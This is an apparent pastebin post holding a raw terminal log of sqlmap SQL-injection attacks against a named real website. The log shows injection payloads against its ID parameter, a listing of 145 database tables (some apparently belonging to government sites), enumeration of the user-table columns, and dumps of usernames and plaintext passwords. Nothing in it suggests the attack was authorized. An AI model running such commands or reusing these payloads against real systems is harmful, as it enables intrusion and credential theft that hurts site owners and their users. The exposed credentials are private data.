Netikerty

I lost my time, are you kidding me?

Feb 21st, 2013
  1. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios --tables
  2.  
  3. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  4. http://sqlmap.org
  5.  
  6. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at 12:53:07
  9.  
  10. [12:53:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8
  11. [12:53:08] [INFO] resuming back-end DBMS 'mysql'
  12. [12:53:08] [INFO] testing connection to the target url
  13. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  14. ---
  15. Place: GET
  16. Parameter: ID
  17. Type: boolean-based blind
  18. Title: AND boolean-based blind - WHERE or HAVING clause
  19. Payload: ID=4233 AND 7933=7933
  20.  
  21. Type: error-based
  22. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  23. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  24.  
  25. Type: AND/OR time-based blind
  26. Title: MySQL > 5.0.11 AND time-based blind
  27. Payload: ID=4233 AND SLEEP(5)
  28. ---
  29.  
  30. [12:53:10] [INFO] the back-end DBMS is MySQL
  31. web server operating system: Linux Fedora 15 (Lovelock)
  32. web application technology: PHP 5.3.6, Apache 2.2.17
  33. back-end DBMS: MySQL 5.0
  34. [12:53:10] [INFO] fetching tables for database: 'dbusuarios'
  35. [12:53:11] [INFO] the SQL query used returns 145 entries
  96. [12:54:26] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  121. [12:55:30] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  183. Database: dbusuarios
  184. [145 tables]
  185. +---------------------------------------------------------+
  186. | `tbl_user_cat_fogel-groupcom` |
  187. | `tbl_user_fogel-groupcom` |
  188. | calendar |
  189. | tbl_bnatelecomcom_precios |
  190. | tbl_bnatelecomcom_precios2 |
  191. | tbl_calendar_aprofamorggt |
  192. | tbl_calendar_casatibetguatemalaorg |
  193. | tbl_calendar_cnnacomgt |
  194. | tbl_calendar_cnnaorggt |
  195. | tbl_calendar_conociendoguatemalacom |
  196. | tbl_calendar_demo |
  197. | tbl_calendar_gua05027org |
  198. | tbl_calendar_ipmorggt |
  199. | tbl_calendar_ipmorggt_public |
  200. | tbl_calendar_mspasgobgt |
  201. | tbl_calendar_ogaorggt |
  202. | tbl_calendar_panadiverscom |
  203. | tbl_calendar_pgngobgt |
  204. | tbl_calendar_polsecorg |
  205. | tbl_calendar_regdhorg |
  206. | tbl_calendar_ripeoeaorg |
  207. | tbl_calendar_semanasantaenlineacom |
  208. | tbl_calendar_vientoencontracom |
  209. | tbl_colegiados_colegiodefarmaceuticoscom |
  210. | tbl_colegiados_saldo_colegiodefarmaceuticoscom |
  211. | tbl_colegiados_saldo_quimicos_colegiodefarmaceuticoscom |
  212. | tbl_csv_fields |
  213. | tbl_csv_tables |
  214. | tbl_puertos_sercimex |
  215. | tbl_purchaseSession_bnatelecomcom |
  216. | tbl_purchaseSession_creadoresvirtualescom |
  217. | tbl_purchaseSession_demo |
  218. | tbl_purchaseSession_discoverguatemalacomgt |
  219. | tbl_purchaseSession_goathemayatravelcom |
  220. | tbl_purchaseSession_telefoninotelcom |
  221. | tbl_random_content_anabellycom |
  222. | tbl_random_content_aprofamorggt |
  223. | tbl_random_content_atacomgt |
  224. | tbl_random_content_atravelcomgt |
  225. | tbl_random_content_azulmodelajecom |
  226. | tbl_random_content_biozoneguatemalacom |
  227. | tbl_random_content_caciforggt |
  228. | tbl_random_content_carrerasuniversitariascom |
  229. | tbl_random_content_cnnaorggt |
  230. | tbl_random_content_conociendoguatemalacom |
  231. | tbl_random_content_ditcomgt |
  232. | tbl_random_content_dobleviabiz |
  233. | tbl_random_content_expodiscoverycom |
  234. | tbl_random_content_globocentrocomgt |
  235. | tbl_random_content_incidejovenorg |
  236. | tbl_random_content_ipmorggt |
  237. | tbl_random_content_iscargogroupcom |
  238. | tbl_random_content_llatzercomgt |
  239. | tbl_random_content_mijutiapacom |
  240. | tbl_random_content_mpgobgt |
  241. | tbl_random_content_mspasgobgt |
  242. | tbl_random_content_pgngobgt |
  243. | tbl_random_content_porminacionorg |
  244. | tbl_random_content_semanasantaenlineacom |
  245. | tbl_random_content_serinconet |
  246. | tbl_random_content_sesangobgt |
  247. | tbl_random_content_tecniscancom |
  248. | tbl_random_content_testvientoencontracom |
  249. | tbl_random_content_yeguadacastanoblecom |
  250. | tbl_selectivo_sercimex |
  251. | tbl_telefoninotelcom_precios |
  252. | tbl_tracking_aduana_sercimexcom |
  253. | tbl_tracking_demo |
  254. | tbl_tracking_detail_demo |
  255. | tbl_tracking_detail_mspasgobgt |
  256. | tbl_tracking_detail_sercimexcom |
  257. | tbl_tracking_detail_worldeliverycom |
  258. | tbl_tracking_mspasgobgt |
  259. | tbl_tracking_sercimexcom |
  260. | tbl_tracking_worldeliverycom |
  261. | tbl_user_adua |
  262. | tbl_user_alberguesdetecpancom |
  263. | tbl_user_anabellycom |
  264. | tbl_user_aprofamorggt |
  265. | tbl_user_auda |
  266. | tbl_user_bnatelecomcom |
  267. | tbl_user_casatibetguatemalaorg |
  268. | tbl_user_cat_adua |
  269. | tbl_user_cat_alberguesdetecpancom |
  270. | tbl_user_cat_anabellycom |
  271. | tbl_user_cat_auda |
  272. | tbl_user_cat_bnatelecomcom |
  273. | tbl_user_cat_casatibetguatemalaorg |
  274. | tbl_user_cat_colegiofarmaceuticoscom |
  275. | tbl_user_cat_creadoresvirtualescom |
  276. | tbl_user_cat_demo |
  277. | tbl_user_cat_dhvihorg |
  278. | tbl_user_cat_discoverguatemalacomgt |
  279. | tbl_user_cat_doblefcom |
  280. | tbl_user_cat_fogelgroupcom |
  281. | tbl_user_cat_gua05027org |
  282. | tbl_user_cat_hidcacom |
  283. | tbl_user_cat_ipmorggt |
  284. | tbl_user_cat_llanezasacom |
  285. | tbl_user_cat_mijutiapacom |
  286. | tbl_user_cat_mpgobgt |
  287. | tbl_user_cat_mspasgobgt |
  288. | tbl_user_cat_multiequiposnet |
  289. | tbl_user_cat_pgngobgt |
  290. | tbl_user_cat_ripeoeaorg |
  291. | tbl_user_cat_telefoninotelcom |
  292. | tbl_user_cat_testvientoencontracom |
  293. | tbl_user_cat_vesuviocomgt |
  294. | tbl_user_cat_vientoencontracom |
  295. | tbl_user_colegiodefarmaceuticoscom |
  296. | tbl_user_creadoresvirtualescom |
  297. | tbl_user_demo |
  298. | tbl_user_dhvihorg |
  299. | tbl_user_discoverguatemalacomgt |
  300. | tbl_user_doblefcom |
  301. | tbl_user_extra_field |
  302. | tbl_user_fogelgroupcom |
  303. | tbl_user_gua05027org |
  304. | tbl_user_hidcacom |
  305. | tbl_user_incidejovenorg |
  306. | tbl_user_ipmorggt |
  307. | tbl_user_llanezasacom |
  308. | tbl_user_log_adua |
  309. | tbl_user_log_alberguesdetecpancom |
  310. | tbl_user_log_bnatelecomcom |
  311. | tbl_user_log_demo |
  312. | tbl_user_log_discoverguatemalacomgt |
  313. | tbl_user_log_gua05027org |
  314. | tbl_user_log_mijutiapacom |
  315. | tbl_user_log_mspasgobgt |
  316. | tbl_user_log_porminacionorg |
  317. | tbl_user_log_telefoninotelcom |
  318. | tbl_user_log_testvientoencontracom |
  319. | tbl_user_log_vientoencontracom |
  320. | tbl_user_mijutiapacom |
  321. | tbl_user_mpgobgt |
  322. | tbl_user_mspasgobgt |
  323. | tbl_user_multiequiposnet |
  324. | tbl_user_pgngobgt |
  325. | tbl_user_porminacionorg |
  326. | tbl_user_ripeoeaorg |
  327. | tbl_user_telefoninotelcom |
  328. | tbl_user_testvientoencontracom |
  329. | tbl_user_vesuviocomgt |
  330. | tbl_user_vientoencontracom |
  331. +---------------------------------------------------------+
  332.  
  333. [12:56:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  334.  
  335. [*] shutting down at 12:56:15
  336.  
  337. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
  338.  
  339. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  340. http://sqlmap.org
  341.  
  342. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  343.  
  344. [*] starting at 01:08:11
  345.  
  346. [01:08:11] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian
  347. [00:08:11] [INFO] resuming back-end DBMS 'mysql'
  348. [00:08:12] [INFO] testing connection to the target url
  349. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  350. ---
  351. Place: GET
  352. Parameter: ID
  353. Type: boolean-based blind
  354. Title: AND boolean-based blind - WHERE or HAVING clause
  355. Payload: ID=4233 AND 7933=7933
  356.  
  357. Type: error-based
  358. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  359. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  360.  
  361. Type: AND/OR time-based blind
  362. Title: MySQL > 5.0.11 AND time-based blind
  363. Payload: ID=4233 AND SLEEP(5)
  364. ---
  365.  
  366. [01:08:13] [INFO] the back-end DBMS is MySQL
  367. web server operating system: Linux Fedora 15 (Lovelock)
  368. web application technology: PHP 5.3.6, Apache 2.2.17
  369. back-end DBMS: MySQL 5.0
  370. [01:08:13] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
  371. [01:08:14] [INFO] the SQL query used returns 11 entries
  372. [01:08:15] [INFO] retrieved: ID_USER
  373. [01:08:15] [INFO] retrieved: mediumint(11)
  374. [01:08:16] [INFO] retrieved: strUserCateg
  375. [01:08:16] [INFO] retrieved: varchar(255)
  376. [01:08:16] [INFO] retrieved: strCodigo
  377. [01:08:17] [INFO] retrieved: varchar(64)
  378. [01:08:17] [INFO] retrieved: strUser
  379. [01:08:18] [INFO] retrieved: varchar(64)
  380. [01:08:18] [INFO] retrieved: strPassword
  381. [01:08:19] [INFO] retrieved: varchar(32)
  382. [01:08:21] [INFO] retrieved: strNombre
  383. [01:08:21] [INFO] retrieved: varchar(64)
  384. [01:08:22] [INFO] retrieved: strApellido
  385. [01:08:22] [INFO] retrieved: varchar(64)
  386. [01:08:23] [INFO] retrieved: strDireccion
  387. [01:08:23] [INFO] retrieved: varchar(255)
  388. [01:08:23] [INFO] retrieved: strTel
  389. [01:08:24] [INFO] retrieved: varchar(14)
  390. [01:08:25] [INFO] retrieved: strfax
  391. [01:08:25] [INFO] retrieved: varchar(14)
  392. [01:08:26] [INFO] retrieved: strEmail
  393. [01:08:27] [INFO] retrieved: varchar(128)
  394. Database: dbusuarios
  395. Table: tbl_user_demo
  396. [11 columns]
  397. +--------------+---------------+
  398. | Column | Type |
  399. +--------------+---------------+
  400. | ID_USER | mediumint(11) |
  401. | strApellido | varchar(64) |
  402. | strCodigo | varchar(64) |
  403. | strDireccion | varchar(255) |
  404. | strEmail | varchar(128) |
  405. | strfax | varchar(14) |
  406. | strNombre | varchar(64) |
  407. | strPassword | varchar(32) |
  408. | strTel | varchar(14) |
  409. | strUser | varchar(64) |
  410. | strUserCateg | varchar(255) |
  411. +--------------+---------------+
  412.  
  413. [01:08:27] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  414.  
  415. [*] shutting down at 00:08:27
  416.  
  417. root@bt:/pentest/database/sqlmap# ./sqlmap.py -uhttp://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_demo --columns
  418.  
  419. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  420. http://sqlmap.org
  421.  
  422. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  423.  
  424. [*] starting at 00:12:52
  425.  
  426. [01:12:53] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
  427. [01:12:53] [INFO] resuming back-end DBMS 'mysql'
  428. [01:12:53] [INFO] testing connection to the target url
  429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  430. ---
  431. Place: GET
  432. Parameter: ID
  433. Type: boolean-based blind
  434. Title: AND boolean-based blind - WHERE or HAVING clause
  435. Payload: ID=4233 AND 7933=7933
  436.  
  437. Type: error-based
  438. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  439. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  440.  
  441. Type: AND/OR time-based blind
  442. Title: MySQL > 5.0.11 AND time-based blind
  443. Payload: ID=4233 AND SLEEP(5)
  444. ---
  445.  
  446. [01:12:55] [INFO] the back-end DBMS is MySQL
  447. web server operating system: Linux Fedora 15 (Lovelock)
  448. web application technology: PHP 5.3.6, Apache 2.2.17
  449. back-end DBMS: MySQL 5.0
  450. [01:12:55] [INFO] fetching columns for table 'tbl_user_demo' in database 'dbusuarios'
  451. [01:12:55] [INFO] the SQL query used returns 11 entries
  452. [01:12:55] [INFO] resumed: ID_USER
  453. [01:12:55] [INFO] resumed: mediumint(11)
  454. [01:12:55] [INFO] resumed: strUserCateg
  455. [01:12:55] [INFO] resumed: varchar(255)
  456. [01:12:55] [INFO] resumed: strCodigo
  457. [01:12:55] [INFO] resumed: varchar(64)
  458. [01:12:55] [INFO] resumed: strUser
  459. [01:12:55] [INFO] resumed: varchar(64)
  460. [01:12:55] [INFO] resumed: strPassword
  461. [01:12:55] [INFO] resumed: varchar(32)
  462. [01:12:55] [INFO] resumed: strNombre
  463. [01:12:55] [INFO] resumed: varchar(64)
  464. [01:12:55] [INFO] resumed: strApellido
  465. [01:12:55] [INFO] resumed: varchar(64)
  466. [01:12:55] [INFO] resumed: strDireccion
  467. [01:12:55] [INFO] resumed: varchar(255)
  468. [01:12:55] [INFO] resumed: strTel
  469. [01:12:55] [INFO] resumed: varchar(14)
  470. [01:12:55] [INFO] resumed: strfax
  471. [01:12:55] [INFO] resumed: varchar(14)
  472. [01:12:55] [INFO] resumed: strEmail
  473. [01:12:55] [INFO] resumed: varchar(128)
  474. Database: dbusuarios
  475. Table: tbl_user_demo
  476. [11 columns]
  477. +--------------+---------------+
  478. | Column | Type |
  479. +--------------+---------------+
  480. | ID_USER | mediumint(11) |
  481. | strApellido | varchar(64) |
  482. | strCodigo | varchar(64) |
  483. | strDireccion | varchar(255) |
  484. | strEmail | varchar(128) |
  485. | strfax | varchar(14) |
  486. | strNombre | varchar(64) |
  487. | strPassword | varchar(32) |
  488. | strTel | varchar(14) |
  489. | strUser | varchar(64) |
  490. | strUserCateg | varchar(255) |
  491. +--------------+---------------+
  492.  
  493. [01:12:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  494.  
  495. [*] shutting down at 01:12:55
  496.  
  497.  
  498. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt --column
  499.  
  500. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  501. http://sqlmap.org
  502.  
  503. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  504.  
  505. [*] starting at 01:26:14
  506.  
  507. [01:26:14] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)
  508. [01:26:15] [INFO] resuming back-end DBMS 'mysql'
  509. [01:26:15] [INFO] testing connection to the target url
  510. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  511. ---
  512. Place: GET
  513. Parameter: ID
  514. Type: boolean-based blind
  515. Title: AND boolean-based blind - WHERE or HAVING clause
  516. Payload: ID=4233 AND 7933=7933
  517.  
  518. Type: error-based
  519. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  520. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  521.  
  522. Type: AND/OR time-based blind
  523. Title: MySQL > 5.0.11 AND time-based blind
  524. Payload: ID=4233 AND SLEEP(5)
  525. ---
  526.  
  527. [01:26:17] [INFO] the back-end DBMS is MySQL
  528. web server operating system: Linux Fedora 15 (Lovelock)
  529. web application technology: PHP 5.3.6, Apache 2.2.17
  530. back-end DBMS: MySQL 5.0
  531. [01:26:17] [INFO] fetching columns for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  532. [01:26:17] [INFO] the SQL query used returns 11 entries
  533. [01:26:18] [INFO] retrieved: ID_USER
  534. [01:26:18] [INFO] retrieved: mediumint(11)
  535. [01:26:20] [INFO] retrieved: strUserCateg
  536. [01:26:21] [INFO] retrieved: varchar(255)
  537. [01:26:21] [INFO] retrieved: strCodigo
  538. [01:26:22] [INFO] retrieved: varchar(64)
  539. [01:26:22] [INFO] retrieved: strUser
  540. [01:26:23] [INFO] retrieved: varchar(64)
  541. [01:26:23] [INFO] retrieved: strPassword
  542. [01:26:24] [INFO] retrieved: varchar(32)
  543. [01:26:24] [INFO] retrieved: strNombre
  544. [01:26:25] [INFO] retrieved: varchar(64)
  545. [01:26:25] [INFO] retrieved: strApellido
  546. [01:26:26] [INFO] retrieved: varchar(64)
  547. [01:26:26] [INFO] retrieved: strDireccion
  548. [01:26:27] [INFO] retrieved: varchar(255)
  549. [01:26:27] [INFO] retrieved: strTel
  550. [01:26:27] [INFO] retrieved: varchar(14)
  551. [01:26:28] [INFO] retrieved: strfax
  552. [01:26:28] [INFO] retrieved: varchar(14)
  553. [01:26:29] [INFO] retrieved: strEmail
  554. [01:26:29] [INFO] retrieved: varchar(128)
  555. Database: dbusuarios
  556. Table: tbl_user_mspasgobgt
  557. [11 columns]
  558. +--------------+---------------+
  559. | Column | Type |
  560. +--------------+---------------+
  561. | ID_USER | mediumint(11) |
  562. | strApellido | varchar(64) |
  563. | strCodigo | varchar(64) |
  564. | strDireccion | varchar(255) |
  565. | strEmail | varchar(128) |
  566. | strfax | varchar(14) |
  567. | strNombre | varchar(64) |
  568. | strPassword | varchar(32) |
  569. | strTel | varchar(14) |
  570. | strUser | varchar(64) |
  571. | strUserCateg | varchar(255) |
  572. +--------------+---------------+
  573.  
  574. [01:26:30] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  575.  
  576. [*] shutting down at 01:26:29
  577.  
  578. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strUser --dump
  579.  
  580. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  581. http://sqlmap.org
  582.  
  583. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  584.  
  585. [*] starting at 01:31:36
  586.  
  587. [01:31:36] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
  588. [01:31:37] [INFO] resuming back-end DBMS 'mysql'
  589. [01:31:37] [INFO] testing connection to the target url
  590. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  591. ---
  592. Place: GET
  593. Parameter: ID
  594. Type: boolean-based blind
  595. Title: AND boolean-based blind - WHERE or HAVING clause
  596. Payload: ID=4233 AND 7933=7933
  597.  
  598. Type: error-based
  599. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  600. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  601.  
  602. Type: AND/OR time-based blind
  603. Title: MySQL > 5.0.11 AND time-based blind
  604. Payload: ID=4233 AND SLEEP(5)
  605. ---
  606.  
  607. [01:31:38] [INFO] the back-end DBMS is MySQL
  608. web server operating system: Linux Fedora 15 (Lovelock)
  609. web application technology: PHP 5.3.6, Apache 2.2.17
  610. back-end DBMS: MySQL 5.0
  611. do you want sqlmap to consider provided column(s):
  612. [1] as LIKE column names (default)
  613. [2] as exact column names
  614. > 2
  615.  
  616. [01:31:41] [INFO] fetching columns 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  617. [01:31:42] [INFO] the SQL query used returns 1 entries
  618. [01:31:43] [INFO] retrieved: strUser
  619. [01:31:43] [INFO] retrieved: varchar(64)
  620. [01:31:43] [INFO] fetching entries of column(s) 'strUser' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  621. [01:31:43] [INFO] the SQL query used returns 2 entries
  622. [01:31:44] [INFO] retrieved: anion
  623. [01:31:44] [INFO] retrieved: ANONYMOUS
  624. [01:31:44] [INFO] analyzing table dump for possible password hashes
  625. Database: dbusuarios
  626. Table: tbl_user_mspasgobgt
  627. [2 entries]
  628. +-----------+
  629. | strUser |
  630. +-----------+
  631. | anion |
  632. | ANONYMOUS |
  633. +-----------+
  634.  
  635. [01:31:45] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
  636. [01:31:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  637.  
  638. [*] shutting down at 01:31:45
  639.  
  640. root@bt:/pentest/database/sqlmap# /sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
  641. bash: /sqlmap.py: No such file or directory
  642. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.catedral.org.gt/index.php?ID=423 --random-agent -D dbusuarios -T tbl_user_mspasgobgt -C strPassword --dump
  643.  
  644. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  645. http://sqlmap.org
  646.  
  647. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  648.  
  649. [*] starting at 01:39:07
  650.  
  651. [01:39:07] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0
  652. [00:39:07] [INFO] resuming back-end DBMS 'mysql'
  653. [00:39:18] [INFO] testing connection to the target url
  654. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  655. ---
  656. Place: GET
  657. Parameter: ID
  658. Type: boolean-based blind
  659. Title: AND boolean-based blind - WHERE or HAVING clause
  660. Payload: ID=4233 AND 7933=7933
  661.  
  662. Type: error-based
  663. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  664. Payload: ID=4233 AND (SELECT 6237 FROM(SELECT COUNT(*),CONCAT(0x3a6363733a,(SELECT (CASE WHEN (6237=6237) THEN 1 ELSE 0 END)),0x3a78756e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  665.  
  666. Type: AND/OR time-based blind
  667. Title: MySQL > 5.0.11 AND time-based blind
  668. Payload: ID=4233 AND SLEEP(5)
  669. ---
  670.  
  671. [01:39:19] [INFO] the back-end DBMS is MySQL
  672. web server operating system: Linux Fedora 15 (Lovelock)
  673. web application technology: PHP 5.3.6, Apache 2.2.17
  674. back-end DBMS: MySQL 5.0
  675. do you want sqlmap to consider provided column(s):
  676. [1] as LIKE column names (default)
  677. [2] as exact column names
  678. > 2
  679.  
  680. [01:39:23] [INFO] fetching columns 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  681. [01:39:23] [INFO] the SQL query used returns 1 entries
  682. [01:39:26] [INFO] retrieved: strPassword
  683. [01:39:26] [INFO] retrieved: varchar(32)
  684. [01:39:26] [INFO] fetching entries of column(s) 'strPassword' for table 'tbl_user_mspasgobgt' in database 'dbusuarios'
  685. [01:39:26] [INFO] the SQL query used returns 2 entries
  686. [01:39:27] [INFO] retrieved: aniongt
  687. [01:39:27] [INFO] retrieved: LOLLOL
  688. [01:39:28] [INFO] analyzing table dump for possible password hashes
  689. Database: dbusuarios
  690. Table: tbl_user_mspasgobgt
  691. [2 entries]
  692. +-------------+
  693. | strPassword |
  694. +-------------+
  695. | aniongt |
  696. | LOLLOL |
  697. +-------------+
  698.  
  699. [01:39:28] [INFO] table 'dbusuarios.tbl_user_mspasgobgt' dumped to CSV file '/pentest/database/sqlmap/output/www.catedral.org.gt/dump/dbusuarios/tbl_user_mspasgobgt.csv'
  700. [01:39:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.catedral.org.gt'
  701.  
  702. [*] shutting down at 01:39:28
  703.  
  704. root@bt:/pentest/database/sqlmap#